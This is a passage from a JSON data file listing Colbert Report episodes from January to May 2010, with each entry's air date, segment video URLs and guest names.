        "http://thecolbertreport.cc.com/videos/et1vio/the-word---honor-bound",
        "http://thecolbertreport.cc.com/videos/7owg19/haiti-disaster-relief-donations---kathleen-sebelius",
        "http://thecolbertreport.cc.com/videos/gqd029/kathleen-sebelius",
        "http://thecolbertreport.cc.com/videos/afqd2o/sign-off---text-for-haiti-disaster-relief"
      ],
      "guest": "Kathleen Sebelius"
    },
    {
      "date": "2010-01-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/i2h2wa/intro---01-18-10",
        "http://thecolbertreport.cc.com/videos/uqolbx/massachusetts-special-election",
        "http://thecolbertreport.cc.com/videos/6s93dq/coal-comfort---margaret-palmer",
        "http://thecolbertreport.cc.com/videos/2kgg0x/own-a-piece-of-histor-me---original-interview-table",
        "http://thecolbertreport.cc.com/videos/r6fzoi/emily-pilloton",
        "http://thecolbertreport.cc.com/videos/47fs6h/sign-off---home-barbershop-quartet-game"
      ],
      "guest": "Dr. Margaret Palmer, Emily Pilloton"
    },
    {
      "date": "2010-01-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/w2qqgl/intro---01-19-10",
        "http://thecolbertreport.cc.com/videos/9t5rlw/onward-christian-soldiers",
        "http://thecolbertreport.cc.com/videos/eseeb0/skate-expectations---speedskating-team-training",
        "http://thecolbertreport.cc.com/videos/nw0obk/skate-expectations---speedskating-team-training---tucker-fredricks",
        "http://thecolbertreport.cc.com/videos/wljw31/stephen-bosworth",
        "http://thecolbertreport.cc.com/videos/5zz1m5/sign-off---teleprompter-in-italics"
      ],
      "guest": "Amb. Stephen Bosworth"
    },
    {
      "date": "2010-01-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/oarl2s/intro---01-20-10",
        "http://thecolbertreport.cc.com/videos/9fshqm/boston-dream-guy",
        "http://thecolbertreport.cc.com/videos/h7cxuq/skate-expectations---speedskating-race",
        "http://thecolbertreport.cc.com/videos/r0fs08/skate-expectations---speedskating-team-training---colbert-vs--davis",
        "http://thecolbertreport.cc.com/videos/9qoq3s/dick-ebersol",
        "http://thecolbertreport.cc.com/videos/ekjbd1/sign-off---original-interview-table-auction"
      ],
      "guest": "Dick Ebersol"
    },
    {
      "date": "2010-01-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dhnvbi/intro---01-21-10",
        "http://thecolbertreport.cc.com/videos/a891l1/own-a-piece-of-histor-me---legendary-interview-table",
        "http://thecolbertreport.cc.com/videos/3t1wu4/taliban-public-relations",
        "http://thecolbertreport.cc.com/videos/61faxb/the-word---two-faced",
        "http://thecolbertreport.cc.com/videos/fqdy69/threatdown---airport-security-edition",
        "http://thecolbertreport.cc.com/videos/nchr4z/john-farmer",
        "http://thecolbertreport.cc.com/videos/ngpu7c/sign-off---raise-money-for-haiti-relief"
      ],
      "guest": "John Farmer"
    },
    {
      "date": "2010-01-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ucog8c/intro---01-25-10",
        "http://thecolbertreport.cc.com/videos/2i26ye/obama-gets-called-for-jury-duty",
        "http://thecolbertreport.cc.com/videos/iyaiyz/the-word---manifest-density",
        "http://thecolbertreport.cc.com/videos/fgn6yx/alpha-dog-of-the-week---harold-ford-jr-",
        "http://thecolbertreport.cc.com/videos/y99wku/kati-marton",
        "http://thecolbertreport.cc.com/videos/6u56ui/sign-off---50th-anniversary-of-bubble-wrap"
      ],
      "guest": "Kati Marton"
    },
    {
      "date": "2010-01-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8ukd1u/andre-bauer-is-not-against-animals",
        "http://thecolbertreport.cc.com/videos/1qu3mj/democrats-must-fight-back---paul-begala",
        "http://thecolbertreport.cc.com/videos/4cv6sy/tip-wag---creigh-deeds---scarebear-trail-companion",
        "http://thecolbertreport.cc.com/videos/t59ksv/mika-brzezinski",
        "http://thecolbertreport.cc.com/videos/oz7mss/own-a-piece-of-histor-me---original-c-shaped-anchor-desk"
      ],
      "guest": "Paul Begala, Mika Brzezinski"
    },
    {
      "date": "2010-01-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5wqyfx/intro---01-27-10",
        "http://thecolbertreport.cc.com/videos/69904a/hamid-karzai-s-fashionable-hat",
        "http://thecolbertreport.cc.com/videos/99bavp/the-word---prece-don-t",
        "http://thecolbertreport.cc.com/videos/9hb7jh/fox-news-puts-james-o-keefe-into-context",
        "http://thecolbertreport.cc.com/videos/suw63r/arthur-benjamin",
        "http://thecolbertreport.cc.com/videos/iljqkj/sign-off---give-stephen-an-ipad"
      ],
      "guest": "Arthur Benjamin"
    },
    {
      "date": "2010-01-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pg6y12/stephen-s-state-of-the-union-speech",
        "http://thecolbertreport.cc.com/videos/lnaqfo/david-gergen",
        "http://thecolbertreport.cc.com/videos/jsxv0a/sport-report---all-white-basketball---jana-rawlinson",
        "http://thecolbertreport.cc.com/videos/xebsoq/sign-off---bid-on-stephen-s-c-shaped-desk"
      ],
      "guest": "David Gergen"
    },
    {
      "date": "2010-02-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pg94s5/the-word---siren-song",
        "http://thecolbertreport.cc.com/videos/2n1vl2/sport-report---nicole-detling-miller---jessica-smith",
        "http://thecolbertreport.cc.com/videos/k0hjb1/harold-ford-jr-",
        "http://thecolbertreport.cc.com/videos/biwfer/sign-off---u-s-a-"
      ],
      "guest": "Nicole Detling Miller, Jessica Smith, Harold Ford Jr."
    },
    {
      "date": "2010-02-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/u6k7x8/intro---02-02-10",
        "http://thecolbertreport.cc.com/videos/idx9j1/the-word---cognoscor-ergo-sum",
        "http://thecolbertreport.cc.com/videos/2ffk5q/bananafish-tale---henry-allen",
        "http://thecolbertreport.cc.com/videos/0xtws0/eliot-spitzer",
        "http://thecolbertreport.cc.com/videos/wfnsyt/sign-off---kentucky-fried-regret"
      ],
      "guest": "Eliot Spitzer"
    },
    {
      "date": "2010-02-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pmvmz3/intro---02-03-10",
        "http://thecolbertreport.cc.com/videos/4nj8ql/be-almost-all-that-you-can-be",
        "http://thecolbertreport.cc.com/videos/5iocp5/job-man-caravan",
        "http://thecolbertreport.cc.com/videos/sysu7h/job-man-caravan---peter-cove",
        "http://thecolbertreport.cc.com/videos/t6rlnb/john-durant",
        "http://thecolbertreport.cc.com/videos/s0494z/sign-off---office-pool"
      ],
      "guest": "Peter Cove, John Durant"
    },
    {
      "date": "2010-02-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zn4dgm/intro---02-04-10",
        "http://thecolbertreport.cc.com/videos/qkvdcs/hermaphrodites-can-t-be-gay",
        "http://thecolbertreport.cc.com/videos/qqtebr/tip-wag---waterboarding---canada-s-history",
        "http://thecolbertreport.cc.com/videos/6a6j6j/formidable-opponent---khalid-sheikh-mohammed-s-trial",
        "http://thecolbertreport.cc.com/videos/sm98y8/henry-louis-gates--jr-",
        "http://thecolbertreport.cc.com/videos/bsgq92/own-a-piece-of-histor-me---fireplace-portrait"
      ],
      "guest": "Henry Louis Gates"
    },
    {
      "date": "2010-02-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ek3awf/exclusive---skate-expectations---bobsled-team-tryouts-pt--1",
        "http://thecolbertreport.cc.com/videos/52kgrq/office-super-bowl-ad-pool",
        "http://thecolbertreport.cc.com/videos/2idiz7/the-word---faux--n--tell",
        "http://thecolbertreport.cc.com/videos/mtoffp/sarah-palin-uses-a-hand-o-prompter",
        "http://thecolbertreport.cc.com/videos/xdafq2/jonathan-safran-foer",
        "http://thecolbertreport.cc.com/videos/r5okcx/sign-off---goodnight"
      ],
      "guest": "Jonathan Safran Foer"
    },
    {
      "date": "2010-02-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/msydxm/exclusive---skate-expectations---bobsled-team-tryouts-pt--2",
        "http://thecolbertreport.cc.com/videos/s5t5z4/celebrate-black-history-month-with-heineken",
        "http://thecolbertreport.cc.com/videos/nwoc1b/corporate-free-speech---chris-dodd",
        "http://thecolbertreport.cc.com/videos/884juj/alpha-dog-of-the-week---markus-bestin",
        "http://thecolbertreport.cc.com/videos/uao9dj/george-stephanopoulos",
        "http://thecolbertreport.cc.com/videos/zcybb6/sign-off---it-s-lonely-at-the-top"
      ],
      "guest": "George Stephanopoulos"
    },
    {
      "date": "2010-02-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ka4dxt/exclusive---skate-expectations---bobsled-team-tryouts-pt--3",
        "http://thecolbertreport.cc.com/videos/l0cv8x/intro---02-10-10",
        "http://thecolbertreport.cc.com/videos/br6hwk/we-re-off-to-see-the-blizzard",
        "http://thecolbertreport.cc.com/videos/cu5mso/better-know-a-district---illinois--5th",
        "http://thecolbertreport.cc.com/videos/3752v8/better-know-a-district---illinois--5th---mike-quigley",
        "http://thecolbertreport.cc.com/videos/34z9mm/claire-danes",
        "http://thecolbertreport.cc.com/videos/f2whru/sign-off---goodnight"
      ],
      "guest": "Claire Danes"
    },
    {
      "date": "2010-02-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/eyfb9f/exclusive---skate-expectations---curling-team-tryouts-pt--1",
        "http://thecolbertreport.cc.com/videos/65cpdn/iran-begins-enriching-uranian",
        "http://thecolbertreport.cc.com/videos/n5w4fs/the-word---political-suicide",
        "http://thecolbertreport.cc.com/videos/li6roe/sport-report---global-snow-drive---al-michaels",
        "http://thecolbertreport.cc.com/videos/s9qfmt/david-ross",
        "http://thecolbertreport.cc.com/videos/qbth0f/sign-off---see-you-in-vancouver"
      ],
      "guest": "Al Michaels, David Ross"
    },
    {
      "date": "2010-02-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jvyagn/exclusive---skate-expectations---speedskating-team-training-pt--1",
        "http://thecolbertreport.cc.com/videos/rbcb67/intro---02-22-10",
        "http://thecolbertreport.cc.com/videos/racwcb/vancouverage-2010---ed-colbert",
        "http://thecolbertreport.cc.com/videos/tzovg4/better-know-a-riding---vancouver-s-south",
        "http://thecolbertreport.cc.com/videos/5l4d9t/better-know-a-riding---vancouver-s-south---ujjal-dosanjh",
        "http://thecolbertreport.cc.com/videos/gg3l88/shaun-white",
        "http://thecolbertreport.cc.com/videos/iohppn/sign-off---you-are-not-americans"
      ],
      "guest": "Shaun White"
    },
    {
      "date": "2010-02-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/iar6l3/exclusive---skate-expectations---speedskating-team-training-pt--2",
        "http://thecolbertreport.cc.com/videos/us6yyq/america-s-olympic-wins---lindsey-vonn",
        "http://thecolbertreport.cc.com/videos/1ftd3s/olympic-international-houses",
        "http://thecolbertreport.cc.com/videos/yd5amw/bob-costas",
        "http://thecolbertreport.cc.com/videos/4vx1ll/sign-off---bob-costas-rides-the-moose"
      ],
      "guest": "Lindsey Vonn, Bob Costas"
    },
    {
      "date": "2010-02-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/j11loy/exclusive---better-know-a-riding---vancouver-s-south---ujjal-dosanjh-pt--1",
        "http://thecolbertreport.cc.com/videos/eom1sq/exclusive---better-know-a-riding---vancouver-s-south---ujjal-dosanjh-pt--2",
        "http://thecolbertreport.cc.com/videos/8olwnj/exclusive---better-know-a-riding---vancouver-s-south---ujjal-dosanjh-pt--3",
        "http://thecolbertreport.cc.com/videos/l0ax8q/exclusive---skate-expectations---speedskating-team-training-pt--3",
        "http://thecolbertreport.cc.com/videos/php8ta/cold-war-update---olympic-edition",
        "http://thecolbertreport.cc.com/videos/mrk7jd/freud-rage---the-iceman-counseleth",
        "http://thecolbertreport.cc.com/videos/7u3h32/ryan-st--onge---jeret-peterson",
        "http://thecolbertreport.cc.com/videos/ampazf/sign-off---as-they-say-in-canada"
      ],
      "guest": "Scott Hamilton, Jeret Peterson, Ryan St. Onge"
    },
    {
      "date": "2010-02-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/i93x4n/exclusive---skate-expectations---speedskating-team-training-pt--4",
        "http://thecolbertreport.cc.com/videos/e7hgxz/intro---02-25-10",
        "http://thecolbertreport.cc.com/videos/jy3odd/stephen-distracts-bob-costas",
        "http://thecolbertreport.cc.com/videos/zoz0j2/freud-rage---the-iceman-counseleth---shani-davis",
        "http://thecolbertreport.cc.com/videos/iactcg/off-notice---canadian-iceholes",
        "http://thecolbertreport.cc.com/videos/j2htnd/seth-wescott",
        "http://thecolbertreport.cc.com/videos/2pub5y/sign-off---thank-you--everyone"
      ],
      "guest": "Shani Davis, Seth Wescott"
    },
    {
      "date": "2010-03-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r61kzy/intro---stephen-wins-the-olympics",
        "http://thecolbertreport.cc.com/videos/z9bfu8/president-obama-mentions-stephen",
        "http://thecolbertreport.cc.com/videos/4nmlgo/health-care-marriage-counseling",
        "http://thecolbertreport.cc.com/videos/6qwf52/olympics-wrap-up---michael-buble",
        "http://thecolbertreport.cc.com/videos/ncbadn/don-cheadle",
        "http://thecolbertreport.cc.com/videos/zbx22j/sign-off---goodnight"
      ],
      "guest": "Don Cheadle"
    },
    {
      "date": "2010-03-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mevtpj/intro---03-02-10",
        "http://thecolbertreport.cc.com/videos/wa48j7/president-obama-s-first-physical",
        "http://thecolbertreport.cc.com/videos/u1ymnx/the-word---kid-owe",
        "http://thecolbertreport.cc.com/videos/odsatp/colbert-platinum---necker-nymph---lexus-lfa",
        "http://thecolbertreport.cc.com/videos/cc44qu/david-brooks",
        "http://thecolbertreport.cc.com/videos/ci6g0d/sign-off---goose-that-lays-the-golden-egg"
      ],
      "guest": "David Brooks"
    },
    {
      "date": "2010-03-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/srp7ci/jim-bunning-ends-filibuster",
        "http://thecolbertreport.cc.com/videos/37u7lc/greece-s-economic-downfall---scheherazade-rehman",
        "http://thecolbertreport.cc.com/videos/elhxu1/tip-wag---american-academy-of-pediatrics---starbucks",
        "http://thecolbertreport.cc.com/videos/m631tw/garry-wills",
        "http://thecolbertreport.cc.com/videos/d3nhmb/sign-off---goodnight"
      ],
      "guest": "Scheherazade Rehman, Garry Wills"
    },
    {
      "date": "2010-03-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lfv3jf/health-care-magic",
        "http://thecolbertreport.cc.com/videos/cgobmb/iraqracy",
        "http://thecolbertreport.cc.com/videos/qdumax/tip-wag---james-o-keefe---sean-hannity",
        "http://thecolbertreport.cc.com/videos/vy9si5/barry-schwartz",
        "http://thecolbertreport.cc.com/videos/r3uuup/sign-off---see-you-later--alligator"
      ],
      "guest": "Barry Schwartz"
    },
    {
      "date": "2010-03-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1919hp/exclusive---olympic-international-houses-pt--2",
        "http://thecolbertreport.cc.com/videos/zqfavl/action-center---health-care-bill---ezra-klein",
        "http://thecolbertreport.cc.com/videos/1nrjt6/tom-hanks-pt--1",
        "http://thecolbertreport.cc.com/videos/49pae4/tom-hanks-pt--2",
        "http://thecolbertreport.cc.com/videos/60qghm/sign-off---one-thought",
        "http://thecolbertreport.cc.com/videos/xdowah/exclusive---olympic-international-houses-pt--1"
      ],
      "guest": "Tom Hanks"
    },
    {
      "date": "2010-03-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6zrwd6/consumer-alert---pringles",
        "http://thecolbertreport.cc.com/videos/rokdab/the-word---define---conquer",
        "http://thecolbertreport.cc.com/videos/b670fj/tip-wag---joe-lieberman--the-pope---sharks",
        "http://thecolbertreport.cc.com/videos/evq830/annie-leonard",
        "http://thecolbertreport.cc.com/videos/887xl8/sign-off---goodnight"
      ],
      "guest": "Annie Leonard"
    },
    {
      "date": "2010-03-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rj79bv/intro---03-10-10",
        "http://thecolbertreport.cc.com/videos/ij37tl/non-sexual-groping",
        "http://thecolbertreport.cc.com/videos/94dkr8/health-care-vote-information-nerve-center---charlie-cook",
        "http://thecolbertreport.cc.com/videos/9m4kr7/survival-seed-bank",
        "http://thecolbertreport.cc.com/videos/ski7ov/sean-carroll",
        "http://thecolbertreport.cc.com/videos/4k81na/sign-off---the-colbert-repoll"
      ],
      "guest": "Sean Carroll"
    },
    {
      "date": "2010-03-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nce2ba/karl-rove-s-new-book",
        "http://thecolbertreport.cc.com/videos/8tmwv8/the-colbert-repoll---scott-rasmussen",
        "http://thecolbertreport.cc.com/videos/8r95fc/monkey-on-the-lam---florida",
        "http://thecolbertreport.cc.com/videos/c8f0b1/david-aaronovitch",
        "http://thecolbertreport.cc.com/videos/96nihd/sign-off---thanks--karl-rove"
      ],
      "guest": "David Aaronovitch"
    },
    {
      "date": "2010-03-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mz0yt2/intro---03-15-10",
        "http://thecolbertreport.cc.com/videos/hut7vd/daylight-savings-time",
        "http://thecolbertreport.cc.com/videos/cfbe28/the-word---afghanistan",
        "http://thecolbertreport.cc.com/videos/402t35/i-can-t-believe-it-s-not-buddha---raj-patel",
        "http://thecolbertreport.cc.com/videos/rf3mus/robert-baer",
        "http://thecolbertreport.cc.com/videos/mdf427/sign-off---goodnight-with-balloon"
      ],
      "guest": "Robert Baer"
    },
    {
      "date": "2010-03-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fmjopd/intro---03-16-10",
        "http://thecolbertreport.cc.com/videos/jz5m0e/barack-joe-bama",
        "http://thecolbertreport.cc.com/videos/wuyjzf/i-s-on-edjukashun---texas-school-board",
        "http://thecolbertreport.cc.com/videos/wl96gx/thought-for-food---donna-simpson--le-whif---cat-litter",
        "http://thecolbertreport.cc.com/videos/4h8104/rebecca-skloot",
        "http://thecolbertreport.cc.com/videos/r6jed2/sign-off---remember-to-wear-green"
      ],
      "guest": "Rebecca Skloot"
    },
    {
      "date": "2010-03-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/86ybsq/ireland-s-shamrock-shortage",
        "http://thecolbertreport.cc.com/videos/wpflq2/sport-report---vasectomies--chess-boxing---golf",
        "http://thecolbertreport.cc.com/videos/m84hav/united-states-census-2010",
        "http://thecolbertreport.cc.com/videos/wqbtkw/nell-irvin-painter",
        "http://thecolbertreport.cc.com/videos/vvqhqa/sign-off---goodnight"
      ],
      "guest": "Nell Irvin Painter"
    },
    {
      "date": "2010-03-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9cthmz/middle-eastern-dogs",
        "http://thecolbertreport.cc.com/videos/oymi80/glenn-beck-attacks-social-justice---james-martin",
        "http://thecolbertreport.cc.com/videos/70uuap/cheating-death---clenched-fingers---pill-reminder",
        "http://thecolbertreport.cc.com/videos/42czdy/mary-matalin",
        "http://thecolbertreport.cc.com/videos/xqfew6/sign-off---goodnight"
      ],
      "guest": "Mary Matalin"
    },
    {
      "date": "2010-03-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uolmzb/passover-dinner-with-elijah",
        "http://thecolbertreport.cc.com/videos/ua8bnx/geriatric-breeding-program",
        "http://thecolbertreport.cc.com/videos/ixrazk/the-word---napoleon-blown-apart",
        "http://thecolbertreport.cc.com/videos/m8ik8j/passover-commercialism",
        "http://thecolbertreport.cc.com/videos/yksbdg/claire-mccaskill",
        "http://thecolbertreport.cc.com/videos/s0mkwg/sign-off---friedrich-schiller"
      ],
      "guest": "Sen. Claire McCaskill"
    },
    {
      "date": "2010-03-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/13gooh/intro---03-30-10",
        "http://thecolbertreport.cc.com/videos/fbk80n/ricky-martin-is-gay",
        "http://thecolbertreport.cc.com/videos/fvq7gv/the-word---forgive-and-forget",
        "http://thecolbertreport.cc.com/videos/dx0lyr/thought-for-food---corn-diapers--fatty-foods---jamie-oliver",
        "http://thecolbertreport.cc.com/videos/51a308/simon-johnson",
        "http://thecolbertreport.cc.com/videos/c9ef0m/sign-off---pringles---whipped-cream"
      ],
      "guest": "Simon Johnson"
    },
    {
      "date": "2010-03-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xyd8rc/intro---03-31-10",
        "http://thecolbertreport.cc.com/videos/phkk0m/who-s-not-honoring-me-now----peabody-awards",
        "http://thecolbertreport.cc.com/videos/mnvsrm/tip-wag---hutaree-militia---abc",
        "http://thecolbertreport.cc.com/videos/p9l3um/easter-under-attack---peeps-display-update",
        "http://thecolbertreport.cc.com/videos/wj35p0/craig-mullaney",
        "http://thecolbertreport.cc.com/videos/bnjl9e/sign-off---finger-pointing-award"
      ],
      "guest": "Craig Mullaney"
    },
    {
      "date": "2010-04-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cej48a/intro---04-01-10",
        "http://thecolbertreport.cc.com/videos/iymjih/stephen-gets-a-free-ipad",
        "http://thecolbertreport.cc.com/videos/2nbqob/elephant-graveyard---david-frum",
        "http://thecolbertreport.cc.com/videos/d9x5mh/jell-o-tampering",
        "http://thecolbertreport.cc.com/videos/3z9wwh/judith-shulevitz",
        "http://thecolbertreport.cc.com/videos/vjehbr/sign-off---goodnight-with-an-ipad"
      ],
      "guest": "David Frum, Judith Shulevitz"
    },
    {
      "date": "2010-04-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5ehjj8/intro---04-05-10",
        "http://thecolbertreport.cc.com/videos/9ef1ri/stephen-converts-to-3d",
        "http://thecolbertreport.cc.com/videos/xo27p1/the-word---bait-and-snitch",
        "http://thecolbertreport.cc.com/videos/rp7kua/threatdown---fox--the-obamas---time-traveling-brandy-thieves",
        "http://thecolbertreport.cc.com/videos/672vju/dean-kamen",
        "http://thecolbertreport.cc.com/videos/zv5abl/sign-off---goodnight-in-3d"
      ],
      "guest": "Dean Kamen"
    },
    {
      "date": "2010-04-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/l4nkoq/science-catfight---joe-bastardi-vs--brenda-ekwurzel",
        "http://thecolbertreport.cc.com/videos/506dri/scrabble-allows-proper-names",
        "http://thecolbertreport.cc.com/videos/hovkbz/al-sharpton",
        "http://thecolbertreport.cc.com/videos/z3ifg9/sign-off---goodnight"
      ],
      "guest": "Joe Bastardi, Brenda Ekwurzel, Rev. Al Sharpton"
    },
    {
      "date": "2010-04-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/b1trvk/tiki-barber-cheats-on-his-wife",
        "http://thecolbertreport.cc.com/videos/ov8dk6/tip-wag---hello-kitty-wine---pig-s-blood-filters",
        "http://thecolbertreport.cc.com/videos/ds7vyt/nailed--em---fentimans-victorian-lemonade",
        "http://thecolbertreport.cc.com/videos/23bsc5/david-simon",
        "http://thecolbertreport.cc.com/videos/c3sk5b/sign-off---hello-kitty-wine---cigarettes"
      ],
      "guest": "David Simon"
    },
    {
      "date": "2010-04-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/x3hnt4/intro---04-08-10",
        "http://thecolbertreport.cc.com/videos/p89oku/tiger-s-nike-commercial",
        "http://thecolbertreport.cc.com/videos/06i9x0/the-word---affirmative-inaction",
        "http://thecolbertreport.cc.com/videos/as4xr9/the-final-final-frontier",
        "http://thecolbertreport.cc.com/videos/kkc8ee/neil-degrasse-tyson",
        "http://thecolbertreport.cc.com/videos/54hsqy/sign-off---no-man-is-a-failure"
      ],
      "guest": "Neil DeGrasse Tyson"
    },
    {
      "date": "2010-04-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5mdm7i/exclusive---julian-assange-extended-interview",
        "http://thecolbertreport.cc.com/videos/vxvlp9/unpaid-internship-crackdown",
        "http://thecolbertreport.cc.com/videos/ag970g/justice-stevens-replacement---jeffrey-toobin",
        "http://thecolbertreport.cc.com/videos/3a0o7p/wikileaks-military-video",
        "http://thecolbertreport.cc.com/videos/q1yz2t/julian-assange",
        "http://thecolbertreport.cc.com/videos/abcefn/sign-off---goodnight"
      ],
      "guest": "Jeffrey Toobin, Julian Assange"
    },
    {
      "date": "2010-04-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/z1lfjo/dow-hits-11-000",
        "http://thecolbertreport.cc.com/videos/fzwwcp/the-word---the-lost-cause",
        "http://thecolbertreport.cc.com/videos/l0qwni/thought-for-food---mentally-ill-advertisers---german-cupcakes",
        "http://thecolbertreport.cc.com/videos/aab36z/jon-mooallem",
        "http://thecolbertreport.cc.com/videos/qrdpob/sign-off---cupcake-chicken-sandwich"
      ],
      "guest": "Jon Mooallem"
    },
    {
      "date": "2010-04-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/i50gi7/president-obama-bows-again",
        "http://thecolbertreport.cc.com/videos/xhpjb5/sunday-morning-fact-checking---jake-tapper---bill-adair",
        "http://thecolbertreport.cc.com/videos/f941v8/ryanair-charges-for-toilets",
        "http://thecolbertreport.cc.com/videos/ohefue/david-shields",
        "http://thecolbertreport.cc.com/videos/igm53s/sign-off---china-s-central-finance-ministry"
      ],
      "guest": "David Shields"
    },
    {
      "date": "2010-04-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/eskkbc/intro---04-15-10",
        "http://thecolbertreport.cc.com/videos/1fannu/stephen-saves-the-space-program",
        "http://thecolbertreport.cc.com/videos/1ymc3v/tip-wag---forbes---hipsters",
        "http://thecolbertreport.cc.com/videos/5gztgb/formula-01-liquid-genetic-material",
        "http://thecolbertreport.cc.com/videos/q2q4mc/aimee-mullins",
        "http://thecolbertreport.cc.com/videos/t03669/sign-off---tax-deadline"
      ],
      "guest": "Aimee Mullins"
    },
    {
      "date": "2010-04-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/o36u2p/marilyn-monroe-s-x-rays",
        "http://thecolbertreport.cc.com/videos/55ox6j/goldman-sachs--fraud-case---andrew-ross-sorkin",
        "http://thecolbertreport.cc.com/videos/cyx4fw/volcano-eyjafjallajokull",
        "http://thecolbertreport.cc.com/videos/ca04kl/george-will",
        "http://thecolbertreport.cc.com/videos/8di6ao/sign-off---too-big-to-fail"
      ],
      "guest": "Andrew Ross Sorkin, George Will"
    },
    {
      "date": "2010-04-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5kfqlg/intro---04-20-10",
        "http://thecolbertreport.cc.com/videos/q0xdhc/robotic-voice-simulator---foreign-accent-syndrome",
        "http://thecolbertreport.cc.com/videos/f5imzl/p-k--winsome---tea-party-consulting",
        "http://thecolbertreport.cc.com/videos/2o8c1s/stephen-refuses-to-celebrate-4-20",
        "http://thecolbertreport.cc.com/videos/n3iff5/jeffrey-katzenberg",
        "http://thecolbertreport.cc.com/videos/kuy0dk/sign-off---as-they-say-in-japan"
      ],
      "guest": "Jeffrey Katzenberg"
    },
    {
      "date": "2010-04-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6z2omj/the-new--100-bill",
        "http://thecolbertreport.cc.com/videos/2nsr1s/the-word---no-problemo",
        "http://thecolbertreport.cc.com/videos/mqfg58/nailed--em---drive-through-rapping",
        "http://thecolbertreport.cc.com/videos/0teg38/craig-robinson",
        "http://thecolbertreport.cc.com/videos/2tayao/sign-off---donate-to-john-legend-s-charity"
      ],
      "guest": "Craig Robinson"
    },
    {
      "date": "2010-04-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/62j0m5/newspapers-celebrate-earth-day",
        "http://thecolbertreport.cc.com/videos/tqucn8/the-word---straight-to-video",
        "http://thecolbertreport.cc.com/videos/g660yb/bonus-word---defamation-of-independents",
        "http://thecolbertreport.cc.com/videos/0le7r3/gorillaz",
        "http://thecolbertreport.cc.com/videos/s79r6n/sign-off---this-is-a-fun-job"
      ],
      "guest": "Gorillaz"
    },
    {
      "date": "2010-04-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/i6lszt/intro---04-26-10",
        "http://thecolbertreport.cc.com/videos/exfe65/boobquake-day-causes-earthquake",
        "http://thecolbertreport.cc.com/videos/ddudkb/the-word---docu-drama",
        "http://thecolbertreport.cc.com/videos/4qgs1h/indecision-2010---midterm-elections---sue-lowden",
        "http://thecolbertreport.cc.com/videos/j7hi89/sharon-jones"
      ],
      "guest": "Sharon Jones and the Dap-Kings"
    },
    {
      "date": "2010-04-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5m4fi7/intro---04-27-10",
        "http://thecolbertreport.cc.com/videos/7b23mk/the-real-lloyd-blankfein",
        "http://thecolbertreport.cc.com/videos/ais5bh/stephen-hawking-is-such-an-a-hole---encountering-aliens",
        "http://thecolbertreport.cc.com/videos/rjye16/conn-iggulden",
        "http://thecolbertreport.cc.com/videos/68bzkf/sign-off---six-flags-discount-tickets"
      ],
      "guest": "Conn Iggulden"
    },
    {
      "date": "2010-04-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/g493lv/intro---04-28-10",
        "http://thecolbertreport.cc.com/videos/uzkxfc/gulf-of-mexico-oil-spill",
        "http://thecolbertreport.cc.com/videos/tzdwrb/cheating-death---tobacco-mints--breast-milk---hallucinogens",
        "http://thecolbertreport.cc.com/videos/ke79c8/difference-makers---robert-ekas",
        "http://thecolbertreport.cc.com/videos/pj9ppq/gregg-easterbrook",
        "http://thecolbertreport.cc.com/videos/1tu0hz/sign-off---chief-wandering-meadow-s-headdress"
      ],
      "guest": "Gregg Easterbrook"
    },
    {
      "date": "2010-04-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qu7aln/intro---rube-goldberg-machine",
        "http://thecolbertreport.cc.com/videos/dima6g/wind-farm---oil-spill",
        "http://thecolbertreport.cc.com/videos/u1djps/california-s-proposition-14---abel-maldonado",
        "http://thecolbertreport.cc.com/videos/yqd68y/tip-wag---scientists---kfc",
        "http://thecolbertreport.cc.com/videos/byd88g/ok-go"
      ],
      "guest": "Abel Maldonado, OK Go"
    },
    {
      "date": "2010-05-03",
      "videos": [
